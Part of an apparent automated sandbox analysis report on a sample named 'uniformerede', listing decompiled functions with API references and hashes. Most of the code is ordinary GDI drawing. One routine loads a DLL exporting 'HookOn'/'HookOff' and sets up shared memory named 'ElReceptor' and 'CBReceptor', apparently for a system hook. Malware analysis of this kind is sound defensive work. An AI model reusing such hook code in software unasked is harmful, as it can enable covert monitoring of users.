                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 80ab367ea45039dbd2bc01dee9e52f96cbb8d261e3d937e86e9258942a4f4849
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84411E656042049AD334EBAF794142A73C8D7D4724364C07FB804EBEE5DB7DA8498A2F
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00426204 Relevance: 37.7, APIs: 25, Instructions: 248windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 52%
                                                                                                                                                                                                                            			E00426204(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
				int _v8;
				int _v12;
				char _v13;
				struct HDC__* _v20;
				void* _v24;
				void* _v28;
				long _v32;
				long _v36;
				intOrPtr _v40;
				intOrPtr* _t78;
				intOrPtr _t87;
				struct HDC__* _t88;
				intOrPtr _t91;
				struct HDC__* _t92;
				struct HDC__* _t135;
				int _t162;
				intOrPtr _t169;
				intOrPtr _t171;
				struct HDC__* _t173;
				int _t175;
				void* _t177;
				void* _t178;
				intOrPtr _t179;

				_t177 = _t178;
				_t179 = _t178 + 0xffffffdc;
				_v12 = __ecx;
				_v8 = __edx;
				_t173 = __eax;
				_t175 = _a16;
				_t162 = _a20;
				_v13 = 1;
				_t78 =  *0x49de34; // 0x49b0ec
				if( *_t78 != 2 || _t162 != _a40 || _t175 != _a36) {
					_v40 = 0;
					_push(0);
					L004072E0();
					_v20 = E00426060(0);
					_push(_t177);
					_push(0x426484);
					_push( *[fs:eax]);
					 *[fs:eax] = _t179;
					_push(_t175);
					_push(_t162);
					_push(_a32);
					L004072D8();
					_v24 = E00426060(_a32);
					_v28 = SelectObject(_v20, _v24);
					_push(0);
					_t87 =  *0x49e894; // 0x5e080725
					_push(_t87);
					_t88 = _a32;
					_push(_t88);
					L00407440();
					_v40 = _t88;
					_push(0);
					_push(_v40);
					_push(_a32);
					L00407440();
					if(_v40 == 0) {
						_push(0xffffffff);
						_t91 =  *0x49e894; // 0x5e080725
						_push(_t91);
						_t92 = _v20;
						_push(_t92);
						L00407440();
						_v40 = _t92;
					} else {
						_push(0xffffffff);
						_push(_v40);
						_t135 = _v20;
						_push(_t135);
						L00407440();
						_v40 = _t135;
					}
					_push(_v20);
					L00407418();
					StretchBlt(_v20, 0, 0, _t162, _t175, _a12, _a8, _a4, _t162, _t175, 0xcc0020);
					StretchBlt(_v20, 0, 0, _t162, _t175, _a32, _a28, _a24, _t162, _t175, 0x440328);
					_v32 = SetTextColor(_t173, 0);
					_v36 = SetBkColor(_t173, 0xffffff);
					StretchBlt(_t173, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t162, _t175, 0x8800c6);
					StretchBlt(_t173, _v8, _v12, _a40, _a36, _v20, 0, 0, _t162, _t175, 0x660046);
					SetTextColor(_t173, _v32);
					SetBkColor(_t173, _v36);
					if(_v28 != 0) {
						SelectObject(_v20, _v28);
					}
					DeleteObject(_v24);
					_pop(_t169);
					 *[fs:eax] = _t169;
					_push(0x42648b);
					if(_v40 != 0) {
						_push(0);
						_push(_v40);
						_push(_v20);
						L00407440();
					}
					return DeleteDC(_v20);
				} else {
					_push(1);
					_push(1);
					_push(_a32);
					L004072D8();
					_v24 = E00426060(_a32);
					_v24 = SelectObject(_a12, _v24);
					_push(_t177);
					_push(0x4262d7);
					_push( *[fs:eax]);
					 *[fs:eax] = _t179;
					MaskBlt(_t173, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, E00407A44(0xaa0029, 0xcc0020));
					_pop(_t171);
					 *[fs:eax] = _t171;
					_push(0x42648b);
					_v24 = SelectObject(_a12, _v24);
					return DeleteObject(_v24);
				}
			}


























                                                                                                                                                                                                                            0x00426205
                                                                                                                                                                                                                            0x00426207
                                                                                                                                                                                                                            0x0042620d
                                                                                                                                                                                                                            0x00426210
                                                                                                                                                                                                                            0x00426213
                                                                                                                                                                                                                            0x00426215
                                                                                                                                                                                                                            0x00426218
                                                                                                                                                                                                                            0x0042621b
                                                                                                                                                                                                                            0x0042621f
                                                                                                                                                                                                                            0x00426227
                                                                                                                                                                                                                            0x004262e0
                                                                                                                                                                                                                            0x004262e3
                                                                                                                                                                                                                            0x004262e5
                                                                                                                                                                                                                            0x004262ef
                                                                                                                                                                                                                            0x004262f4
                                                                                                                                                                                                                            0x004262f5
                                                                                                                                                                                                                            0x004262fa
                                                                                                                                                                                                                            0x004262fd
                                                                                                                                                                                                                            0x00426300
                                                                                                                                                                                                                            0x00426301
                                                                                                                                                                                                                            0x00426305
                                                                                                                                                                                                                            0x00426306
                                                                                                                                                                                                                            0x00426310
                                                                                                                                                                                                                            0x00426320
                                                                                                                                                                                                                            0x00426323
                                                                                                                                                                                                                            0x00426325
                                                                                                                                                                                                                            0x0042632a
                                                                                                                                                                                                                            0x0042632b
                                                                                                                                                                                                                            0x0042632e
                                                                                                                                                                                                                            0x0042632f
                                                                                                                                                                                                                            0x00426334
                                                                                                                                                                                                                            0x00426337
                                                                                                                                                                                                                            0x0042633c
                                                                                                                                                                                                                            0x00426340
                                                                                                                                                                                                                            0x00426341
                                                                                                                                                                                                                            0x0042634a
                                                                                                                                                                                                                            0x00426360
                                                                                                                                                                                                                            0x00426362
                                                                                                                                                                                                                            0x00426367
                                                                                                                                                                                                                            0x00426368
                                                                                                                                                                                                                            0x0042636b
                                                                                                                                                                                                                            0x0042636c
                                                                                                                                                                                                                            0x00426371
                                                                                                                                                                                                                            0x0042634c
                                                                                                                                                                                                                            0x0042634c
                                                                                                                                                                                                                            0x00426351
                                                                                                                                                                                                                            0x00426352
                                                                                                                                                                                                                            0x00426355
                                                                                                                                                                                                                            0x00426356
                                                                                                                                                                                                                            0x0042635b
                                                                                                                                                                                                                            0x0042635b
                                                                                                                                                                                                                            0x00426377
                                                                                                                                                                                                                            0x00426378
                                                                                                                                                                                                                            0x0042639a
                                                                                                                                                                                                                            0x004263bc
                                                                                                                                                                                                                            0x004263c9
                                                                                                                                                                                                                            0x004263d7
                                                                                                                                                                                                                            0x004263fe
                                                                                                                                                                                                                            0x00426423
                                                                                                                                                                                                                            0x0042642d
                                                                                                                                                                                                                            0x00426437
                                                                                                                                                                                                                            0x00426440
                                                                                                                                                                                                                            0x0042644a
                                                                                                                                                                                                                            0x0042644a
                                                                                                                                                                                                                            0x00426453
                                                                                                                                                                                                                            0x0042645a
                                                                                                                                                                                                                            0x0042645d
                                                                                                                                                                                                                            0x00426460
                                                                                                                                                                                                                            0x00426469
                                                                                                                                                                                                                            0x0042646b
                                                                                                                                                                                                                            0x00426470
                                                                                                                                                                                                                            0x00426474
                                                                                                                                                                                                                            0x00426475
                                                                                                                                                                                                                            0x00426475
                                                                                                                                                                                                                            0x00426483
                                                                                                                                                                                                                            0x0042623f
                                                                                                                                                                                                                            0x0042623f
                                                                                                                                                                                                                            0x00426241
                                                                                                                                                                                                                            0x00426246
                                                                                                                                                                                                                            0x00426247
                                                                                                                                                                                                                            0x00426251
                                                                                                                                                                                                                            0x00426261
                                                                                                                                                                                                                            0x00426266
                                                                                                                                                                                                                            0x00426267
                                                                                                                                                                                                                            0x0042626c
                                                                                                                                                                                                                            0x0042626f
                                                                                                                                                                                                                            0x004262ab
                                                                                                                                                                                                                            0x004262b2
                                                                                                                                                                                                                            0x004262b5
                                                                                                                                                                                                                            0x004262b8
                                                                                                                                                                                                                            0x004262ca
                                                                                                                                                                                                                            0x004262d6
                                                                                                                                                                                                                            0x004262d6

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9A520.GDI32(?,00000001,00000001), ref: 00426247
                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 0042625C
                                                                                                                                                                                                                            • MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,004262D7,?,?), ref: 004262AB
                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 004262C5
                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004262D1
                                                                                                                                                                                                                            • 73C9A590.GDI32(00000000), ref: 004262E5
                                                                                                                                                                                                                            • 73C9A520.GDI32(?,?,?,00000000,00426484,?,00000000), ref: 00426306
                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 0042631B
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,5E080725,00000000,?,?,?,?,?,00000000,00426484,?,00000000), ref: 0042632F
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,?,00000000,?,5E080725,00000000,?,?,?,?,?,00000000,00426484,?,00000000), ref: 00426341
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,00000000,000000FF,?,?,00000000,?,5E080725,00000000,?,?,?,?,?,00000000,00426484), ref: 00426356
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,5E080725,000000FF,?,?,00000000,?,5E080725,00000000,?,?,?,?,?,00000000,00426484), ref: 0042636C
                                                                                                                                                                                                                            • 73C9B150.GDI32(?,?,5E080725,000000FF,?,?,00000000,?,5E080725,00000000,?,?,?,?,?,00000000), ref: 00426378
                                                                                                                                                                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0042639A
                                                                                                                                                                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 004263BC
                                                                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 004263C4
                                                                                                                                                                                                                            • SetBkColor.GDI32(?,00FFFFFF), ref: 004263D2
                                                                                                                                                                                                                            • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 004263FE
                                                                                                                                                                                                                            • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00426423
                                                                                                                                                                                                                            • SetTextColor.GDI32(?,?), ref: 0042642D
                                                                                                                                                                                                                            • SetBkColor.GDI32(?,?), ref: 00426437
                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0042644A
                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00426453
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,00000000,00000000,0042648B,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 00426475
                                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 0042647E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Object$B410$ColorSelectStretch$Delete$A520Text$A590B150Mask
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3348367721-0
                                                                                                                                                                                                                            • Opcode ID: f0ca5a636ac73ba622d966c104afb591202a263e1aac509bb4c4970d7894d6e6
                                                                                                                                                                                                                            • Instruction ID: aac08ee918962813e68096157f6589243fc941b0343c0b747259aa04d8bf8f88
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f0ca5a636ac73ba622d966c104afb591202a263e1aac509bb4c4970d7894d6e6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7681A6B1A44218AFDB50EE99CD81FAF7BECAB0D714F510559FA18F7281C238AD008B75
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00429708 Relevance: 31.7, APIs: 21, Instructions: 194windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                                                                            			E00429708(void* __eax, long __ecx, intOrPtr __edx) {
				void* _v8;
				intOrPtr _v12;
				struct HDC__* _v16;
				struct HDC__* _v20;
				char _v21;
				void* _v28;
				void* _v32;
				intOrPtr _v92;
				intOrPtr _v96;
				int _v108;
				int _v112;
				void _v116;
				void* _t64;
				int _t65;
				intOrPtr _t66;
				long _t77;
				void* _t107;
				intOrPtr _t116;
				intOrPtr _t117;
				long _t120;
				intOrPtr _t123;
				void* _t127;
				void* _t129;
				intOrPtr _t130;

				_t127 = _t129;
				_t130 = _t129 + 0xffffff90;
				_t120 = __ecx;
				_t123 = __edx;
				_t107 = __eax;
				_v8 = 0;
				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
					return _v8;
				} else {
					E00428BFC(_t107);
					_v12 = 0;
					_v20 = 0;
					_push(_t127);
					_push(0x429903);
					_push( *[fs:eax]);
					 *[fs:eax] = _t130;
					_push(0);
					L00407638();
					_v12 = E00426060(0);
					_push(_v12);
					L004072E0();
					_v20 = E00426060(_v12);
					_push(0);
					_push(1);
					_push(1);
					_push(_v108);
					_t64 = _v112;
					_push(_t64);
					L004072C8();
					_v8 = _t64;
					if(_v8 == 0) {
						L17:
						_t65 = 0;
						_pop(_t116);
						 *[fs:eax] = _t116;
						_push(0x42990a);
						if(_v20 != 0) {
							_t65 = DeleteDC(_v20);
						}
						if(_v12 != 0) {
							_t66 = _v12;
							_push(_t66);
							_push(0);
							L00407888();
							return _t66;
						}
						return _t65;
					} else {
						_v32 = SelectObject(_v20, _v8);
						if(__ecx != 0x1fffffff) {
							_push(_v12);
							L004072E0();
							_v16 = E00426060(_v12);
							_push(_t127);
							_push(0x4298bb);
							_push( *[fs:eax]);
							 *[fs:eax] = _t130;
							if(_v96 == 0) {
								_v21 = 0;
							} else {
								_v21 = 1;
								_v92 = 0;
								_t107 = E00429040(_t107, _t123, _t123, 0,  &_v116);
							}
							_v28 = SelectObject(_v16, _t107);
							if(_t123 != 0) {
								_push(0);
								_push(_t123);
								_push(_v16);
								L00407440();
								_push(_v16);
								L00407418();
								_push(0);
								_push(_t123);
								_push(_v20);
								L00407440();
								_push(_v20);
								L00407418();
							}
							_t77 = SetBkColor(_v16, _t120);
							_push(0xcc0020);
							_push(0);
							_push(0);
							_push(_v16);
							_push(_v108);
							_push(_v112);
							_push(0);
							_push(0);
							_push(_v20);
							L004072B8();
							SetBkColor(_v16, _t77);
							if(_v28 != 0) {
								SelectObject(_v16, _v28);
							}
							if(_v21 != 0) {
								DeleteObject(_t107);
							}
							_pop(_t117);
							 *[fs:eax] = _t117;
							_push(0x4298c2);
							return DeleteDC(_v16);
						} else {
							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
							if(_v32 != 0) {
								SelectObject(_v20, _v32);
							}
							goto L17;
						}
					}
				}
			}



























                                                                                                                                                                                                                            0x00429709
                                                                                                                                                                                                                            0x0042970b
                                                                                                                                                                                                                            0x00429711
                                                                                                                                                                                                                            0x00429713
                                                                                                                                                                                                                            0x00429715
                                                                                                                                                                                                                            0x00429719
                                                                                                                                                                                                                            0x0042971e
                                                                                                                                                                                                                            0x00429913
                                                                                                                                                                                                                            0x00429738
                                                                                                                                                                                                                            0x0042973a
                                                                                                                                                                                                                            0x00429741
                                                                                                                                                                                                                            0x00429746
                                                                                                                                                                                                                            0x0042974b
                                                                                                                                                                                                                            0x0042974c
                                                                                                                                                                                                                            0x00429751
                                                                                                                                                                                                                            0x00429754
                                                                                                                                                                                                                            0x00429757
                                                                                                                                                                                                                            0x00429759
                                                                                                                                                                                                                            0x00429763
                                                                                                                                                                                                                            0x00429769
                                                                                                                                                                                                                            0x0042976a
                                                                                                                                                                                                                            0x00429774
                                                                                                                                                                                                                            0x00429777
                                                                                                                                                                                                                            0x00429779
                                                                                                                                                                                                                            0x0042977b
                                                                                                                                                                                                                            0x00429780
                                                                                                                                                                                                                            0x00429781
                                                                                                                                                                                                                            0x00429784
                                                                                                                                                                                                                            0x00429785
                                                                                                                                                                                                                            0x0042978a
                                                                                                                                                                                                                            0x00429791
                                                                                                                                                                                                                            0x004298d5
                                                                                                                                                                                                                            0x004298d5
                                                                                                                                                                                                                            0x004298d7
                                                                                                                                                                                                                            0x004298da
                                                                                                                                                                                                                            0x004298dd
                                                                                                                                                                                                                            0x004298e6
                                                                                                                                                                                                                            0x004298ec
                                                                                                                                                                                                                            0x004298ec
                                                                                                                                                                                                                            0x004298f5
                                                                                                                                                                                                                            0x004298f7
                                                                                                                                                                                                                            0x004298fa
                                                                                                                                                                                                                            0x004298fb
                                                                                                                                                                                                                            0x004298fd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004298fd
                                                                                                                                                                                                                            0x00429902
                                                                                                                                                                                                                            0x00429797
                                                                                                                                                                                                                            0x004297a4
                                                                                                                                                                                                                            0x004297ad
                                                                                                                                                                                                                            0x004297ce
                                                                                                                                                                                                                            0x004297cf
                                                                                                                                                                                                                            0x004297d9
                                                                                                                                                                                                                            0x004297de
                                                                                                                                                                                                                            0x004297df
                                                                                                                                                                                                                            0x004297e4
                                                                                                                                                                                                                            0x004297e7
                                                                                                                                                                                                                            0x004297ee
                                                                                                                                                                                                                            0x0042980e
                                                                                                                                                                                                                            0x004297f0
                                                                                                                                                                                                                            0x004297f0
                                                                                                                                                                                                                            0x004297f6
                                                                                                                                                                                                                            0x0042980a
                                                                                                                                                                                                                            0x0042980a
                                                                                                                                                                                                                            0x0042981c
                                                                                                                                                                                                                            0x00429821
                                                                                                                                                                                                                            0x00429823
                                                                                                                                                                                                                            0x00429825
                                                                                                                                                                                                                            0x00429829
                                                                                                                                                                                                                            0x0042982a
                                                                                                                                                                                                                            0x00429832
                                                                                                                                                                                                                            0x00429833
                                                                                                                                                                                                                            0x00429838
                                                                                                                                                                                                                            0x0042983a
                                                                                                                                                                                                                            0x0042983e
                                                                                                                                                                                                                            0x0042983f
                                                                                                                                                                                                                            0x00429847
                                                                                                                                                                                                                            0x00429848
                                                                                                                                                                                                                            0x00429848
                                                                                                                                                                                                                            0x00429852
                                                                                                                                                                                                                            0x00429859
                                                                                                                                                                                                                            0x0042985e
                                                                                                                                                                                                                            0x00429860
                                                                                                                                                                                                                            0x00429865
                                                                                                                                                                                                                            0x00429869
                                                                                                                                                                                                                            0x0042986d
                                                                                                                                                                                                                            0x0042986e
                                                                                                                                                                                                                            0x00429870
                                                                                                                                                                                                                            0x00429875
                                                                                                                                                                                                                            0x00429876
                                                                                                                                                                                                                            0x00429880
                                                                                                                                                                                                                            0x00429889
                                                                                                                                                                                                                            0x00429893
                                                                                                                                                                                                                            0x00429893
                                                                                                                                                                                                                            0x0042989c
                                                                                                                                                                                                                            0x0042989f
                                                                                                                                                                                                                            0x0042989f
                                                                                                                                                                                                                            0x004298a6
                                                                                                                                                                                                                            0x004298a9
                                                                                                                                                                                                                            0x004298ac
                                                                                                                                                                                                                            0x004298ba
                                                                                                                                                                                                                            0x004297af
                                                                                                                                                                                                                            0x004297c1
                                                                                                                                                                                                                            0x004298c6
                                                                                                                                                                                                                            0x004298d0
                                                                                                                                                                                                                            0x004298d0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004298c6
                                                                                                                                                                                                                            0x004297ad
                                                                                                                                                                                                                            0x00429791

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetObjectA.GDI32(?,00000054,?), ref: 0042972B
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000,00000000,00429903,?,?,00000054,?), ref: 00429759
                                                                                                                                                                                                                            • 73C9A590.GDI32(?,00000000,00000000,00429903,?,?,00000054,?), ref: 0042976A
                                                                                                                                                                                                                            • 73C9A410.GDI32(?,?,00000001,00000001,00000000,?,00000000,00000000,00429903,?,?,00000054,?), ref: 00429785
                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0042979F
                                                                                                                                                                                                                            • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 004297C1
                                                                                                                                                                                                                            • 73C9A590.GDI32(?,?,00000000,?,?,00000001,00000001,00000000,?,00000000,00000000,00429903,?,?,00000054,?), ref: 004297CF
                                                                                                                                                                                                                            • SelectObject.GDI32(?), ref: 00429817
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,?,00000000,?,?,00000000,004298BB,?,?,?,00000000,?,?,00000001,00000001,00000000), ref: 0042982A
                                                                                                                                                                                                                            • 73C9B150.GDI32(?,?,?,00000000,?,?,00000000,004298BB,?,?,?,00000000,?,?,00000001,00000001), ref: 00429833
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,?,00000000,?,?,?,00000000,?,?,00000000,004298BB,?,?,?,00000000,?), ref: 0042983F
                                                                                                                                                                                                                            • 73C9B150.GDI32(?,?,?,00000000,?,?,?,00000000,?,?,00000000,004298BB,?,?,?,00000000), ref: 00429848
                                                                                                                                                                                                                            • SetBkColor.GDI32(?), ref: 00429852
                                                                                                                                                                                                                            • 73CA97E0.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,?,?,?,00000000,004298BB), ref: 00429876
                                                                                                                                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 00429880
                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00429893
                                                                                                                                                                                                                            • DeleteObject.GDI32 ref: 0042989F
                                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 004298B5
                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 004298D0
                                                                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 004298EC
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,00000000,0042990A,00000001,00000000,?,00000000,00000000,00429903,?,?,00000054,?), ref: 004298FD
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Object$Select$Delete$A590B150B410Color$A410B380
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2498167796-0
                                                                                                                                                                                                                            • Opcode ID: e7f05d306d0a013c5589103182213554a4e474e5cc72dcb54e20afbaf3b7396a
                                                                                                                                                                                                                            • Instruction ID: d4ef2d2dc6560d6c5cd56807feb3c438281ae7d61b0b2818eaec840712012d23
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7f05d306d0a013c5589103182213554a4e474e5cc72dcb54e20afbaf3b7396a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95516071F04218BBDB10EBE9DC45FAFB7FCAB09704F54446AB614F7281C678A9408B69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004764E4 Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 144filelibraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                            			E004764E4(void* __eax, void* __ebx, void __ecx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				struct HINSTANCE__* _t30;
				intOrPtr _t46;
				intOrPtr _t70;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t89;
				void _t97;
				void* _t99;
				intOrPtr _t102;

				_push(0);
				_t97 = __ecx;
				_t74 = __edx;
				_t99 = __eax;
				_push(_t102);
				_push(0x476697);
				_push( *[fs:eax]);
				 *[fs:eax] = _t102;
				if(__edx == 0) {
					if( *((intOrPtr*)(__eax + 0x48)) != 0) {
						 *((intOrPtr*)(__eax + 0x48))();
					}
					_t30 =  *(_t99 + 0x40);
					if(_t30 != 0) {
						FreeLibrary(_t30);
					}
					if( *(_t99 + 0x30) != 0) {
						UnmapViewOfFile( *(_t99 + 0x38));
						UnmapViewOfFile( *(_t99 + 0x3c));
						CloseHandle( *(_t99 + 0x30));
						CloseHandle( *(_t99 + 0x34));
					}
				} else {
					_t82 =  *0x49ec58; // 0x0
					E0047671C(__edx, _t82, __edx, __ecx, __eax);
					_t46 =  *0x49ec5c; // 0x0
					 *(_t99 + 0x40) = LoadLibraryA(E00404E80(_t46));
					if( *(_t99 + 0x40) == 0) {
						_t86 =  *0x49ec58; // 0x0
						E00404CCC( &_v8, _t86, 0x4766ac);
						E0047671C(_t74, _v8, _t74, _t97, _t99);
						_t70 =  *0x49ec5c; // 0x0
						 *(_t99 + 0x40) = LoadLibraryA(E00404E80(_t70));
					}
					 *((intOrPtr*)(_t99 + 0x44)) = GetProcAddress( *(_t99 + 0x40), "HookOn");
					 *((intOrPtr*)(_t99 + 0x48)) = GetProcAddress( *(_t99 + 0x40), "HookOff");
					if( *((intOrPtr*)(_t99 + 0x44)) == 0 ||  *((intOrPtr*)(_t99 + 0x48)) == 0) {
						E0040D144(0x4766c8, 1);
						E00404378();
					}
					_t75 = CreateFileMappingA(0xffffffff, 0, 4, 0, 4, "ElReceptor");
					 *(_t99 + 0x30) = _t75;
					if(_t75 == 0) {
						E0040D144(0x4766f8, 1);
						E00404378();
					}
					_t76 = MapViewOfFile( *(_t99 + 0x30), 2, 0, 0, 0);
					 *(_t99 + 0x38) = _t76;
					 *_t76 = _t97;
					_t77 = CreateFileMappingA(0xffffffff, 0, 4, 0, 4, "CBReceptor");
					 *(_t99 + 0x34) = _t77;
					if(_t77 == 0) {
						E0040D144(0x4766f8, 1);
						E00404378();
					}
					_t78 = MapViewOfFile( *(_t99 + 0x34), 2, 0, 0, 0);
					 *(_t99 + 0x3c) = _t78;
					 *_t78 = _t97;
					 *((intOrPtr*)(_t99 + 0x44))();
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(0x47669e);
				return E004049C0( &_v8);
			}


















                                                                                                                                                                                                                            0x004764e7
                                                                                                                                                                                                                            0x004764ec
                                                                                                                                                                                                                            0x004764ee
                                                                                                                                                                                                                            0x004764f0
                                                                                                                                                                                                                            0x004764f4
                                                                                                                                                                                                                            0x004764f5
                                                                                                                                                                                                                            0x004764fa
                                                                                                                                                                                                                            0x004764fd
                                                                                                                                                                                                                            0x00476502
                                                                                                                                                                                                                            0x00476645
                                                                                                                                                                                                                            0x00476647
                                                                                                                                                                                                                            0x00476647
                                                                                                                                                                                                                            0x0047664a
                                                                                                                                                                                                                            0x0047664f
                                                                                                                                                                                                                            0x00476652
                                                                                                                                                                                                                            0x00476652
                                                                                                                                                                                                                            0x0047665b
                                                                                                                                                                                                                            0x00476661
                                                                                                                                                                                                                            0x0047666a
                                                                                                                                                                                                                            0x00476673
                                                                                                                                                                                                                            0x0047667c
                                                                                                                                                                                                                            0x0047667c
                                                                                                                                                                                                                            0x00476508
                                                                                                                                                                                                                            0x00476508
                                                                                                                                                                                                                            0x00476512
                                                                                                                                                                                                                            0x00476517
                                                                                                                                                                                                                            0x00476527
                                                                                                                                                                                                                            0x0047652e
                                                                                                                                                                                                                            0x00476533
                                                                                                                                                                                                                            0x0047653e
                                                                                                                                                                                                                            0x0047654a
                                                                                                                                                                                                                            0x0047654f
                                                                                                                                                                                                                            0x0047655f
                                                                                                                                                                                                                            0x0047655f
                                                                                                                                                                                                                            0x00476570
                                                                                                                                                                                                                            0x00476581
                                                                                                                                                                                                                            0x00476588
                                                                                                                                                                                                                            0x0047659c
                                                                                                                                                                                                                            0x004765a1
                                                                                                                                                                                                                            0x004765a1
                                                                                                                                                                                                                            0x004765ba
                                                                                                                                                                                                                            0x004765bc
                                                                                                                                                                                                                            0x004765c1
                                                                                                                                                                                                                            0x004765cf
                                                                                                                                                                                                                            0x004765d4
                                                                                                                                                                                                                            0x004765d4
                                                                                                                                                                                                                            0x004765ea
                                                                                                                                                                                                                            0x004765ec
                                                                                                                                                                                                                            0x004765ef
                                                                                                                                                                                                                            0x00476605
                                                                                                                                                                                                                            0x00476607
                                                                                                                                                                                                                            0x0047660c
                                                                                                                                                                                                                            0x0047661a
                                                                                                                                                                                                                            0x0047661f
                                                                                                                                                                                                                            0x0047661f
                                                                                                                                                                                                                            0x00476635
                                                                                                                                                                                                                            0x00476637
                                                                                                                                                                                                                            0x0047663a
                                                                                                                                                                                                                            0x0047663c
                                                                                                                                                                                                                            0x0047663c
                                                                                                                                                                                                                            0x00476683
                                                                                                                                                                                                                            0x00476686
                                                                                                                                                                                                                            0x00476689
                                                                                                                                                                                                                            0x00476696

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00476697,?,?,?,?,00000000), ref: 00476522
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000000,00476697), ref: 0047655A
